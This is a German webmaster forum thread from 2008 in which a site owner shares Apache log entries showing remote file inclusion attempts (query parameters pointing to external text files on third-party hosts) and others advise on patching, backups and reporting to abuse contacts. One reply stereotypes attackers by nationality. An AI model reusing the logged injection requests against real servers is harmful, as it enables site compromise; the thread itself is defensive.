Seite 1 von 1
Hackerangriffe melden?
Verfasst: 03.06.2008, 19:38
von Thmas35
Hallo, ich habe hiermal eine ganz unbedarfte Frage. Wenn ich in meine Server Log Files schaue und ich einen Eintrag für einen Hacker Angriff halte, wo kann ich diesen melden bzw. zur genaueren Analyse schicken?
Code: Alles auswählen
[Tue Jun 03 15:15:02 2008] [error] [client 201.238.195.13] PHP Warning: parse_url(/admin.php?include_path=http://www.wingsart.ru/gstbook/templates/liscence.txt?): Unable to parse URL in /srv/www/vhosts/meinedomain.de/httpdocs/typo3conf/ext/realurl/class.tx_realurl.php on line 724
und hier nocheinmal von einer anderen Domain:
Code: Alles auswählen
[Mon Jun 02 23:42:24 2008] [error] [client 64.202.117.159] PHP Warning: parse_url(/includes/function.php?root_path=http://www.walmax.eu/upload/.help/test.txt?): Unable to parse URL in /srv/www/vhosts/meinedomain.de/httpdocs/typo3conf/ext/realurl/class.tx_realurl.php on line 724
Hier versucht doch irgendwer ein File von mir zu parsen, wenn ich das richtig interpretiere.
Verfasst:
von
SEO Consulting bei
ABAKUS Internet Marketing Erfahrung seit 2002
- persönliche Betreuung
- individuelle Beratung
- kompetente Umsetzung
Jetzt anfragen:
0511 / 300325-0.
Verfasst: 03.06.2008, 19:41
von emel
Hmm,
ich sehe sowas auch ziemlich oft. Besonders bei "eigenbauten". Finde es aber eher lustig wenn die leute denken die kommen mit ihren j**mla oder b*ard hack da rein.
So ist das leider im Internet. Gab mal so ne Statistik die besagt, dass ein rechner der "ungeschützt" ins netz geht im durchschnitt nach 24 minuten zum ersten mal von einem virus oder ähnlichem befallen wird/ist.
Verfasst: 03.06.2008, 19:44
von Mr Omega
Das beste wird sein, Du gehst Deine Scripte durch und schaust nach Schwachstellen, gegen die meißten Hacker wirst Du machtlos sein, wenn Du diese verfolgen willst, die werden schon dafür gesorgt haben, dass eine Zurückverfolgung ausgeschlossen werden kann.
Mit sicheren Scripten fährst Du auf Dauer immer besser, obwohl ein wirklich Sicher wird es auch nicht zu 100 % geben.
Ansonsten, kannst Du natürlich ganz normal eine Anzeige gegen Unbekannt bei der Polizei stellen, aber die Aussichten auf Erfolg sind da eher gering.
Verfasst: 03.06.2008, 19:52
von GreenHorn
...und mach je nach Dynamik des Portales turnusmäßig backups (zur Sicherheit auf wenigstens zwei getrennten Speichermedien),
mit dem im Ernstfall der Kasperkram überschrieben werden kann.
Verfasst: 04.06.2008, 10:40
von ole1210
Schau dir mal an, woher die IPs kommen, die die "Angriffe" durchführen.
Das sind irgendwelche Script-Kiddies, die sich in einschlägigen Foren über die Sicherheitslücken informieren und drauflos "hacken".
Wenn du "Glück" hast kommen die aus "zivilisierten" Nationen wie Nordamerika, in der Regel sind das aber Russen, Asiaten, Türken, etc.
Kannst dich ja mal mit deinem Anwalt darüber unterhalten....der wird lachend vom Stuhl fallen..
Verfasst: 04.06.2008, 22:39
von Thmas35
Das ist ja alles schön und gut, ich will aber nicht gleich zu den grünen rennen und den unbekannten anzeigen. Ich suche eher nach einer Möglichkeit, so wie bei einem auftretenen Virus, solche Angriffe zu melden. Das hätte den Vorteil, das die entsprechenden Webmaster, die ja "gehackt" (obwohl das ne Beledigung für einen Hacker wäre) wurden benachrichtigt werden, um ihre Schotten dicht zu machen.
Verfasst: 04.06.2008, 23:54
von Airport1
Hierzu gibt es eigentlich die Moeglichkeit sich an
abuse@betreiberDiesesIPRanges
zu melden (die Range bzw. abuse-eMail-Adresse bekommst Du z.B. mit dnsstuff(.com?) heraus). je nachdem wer der Betreiber ist wird etwas unternommen (z.B. derjenige verwarnt oder sein Zugang abgeklemmt) oder leider auch haeufig geschieht nichts..
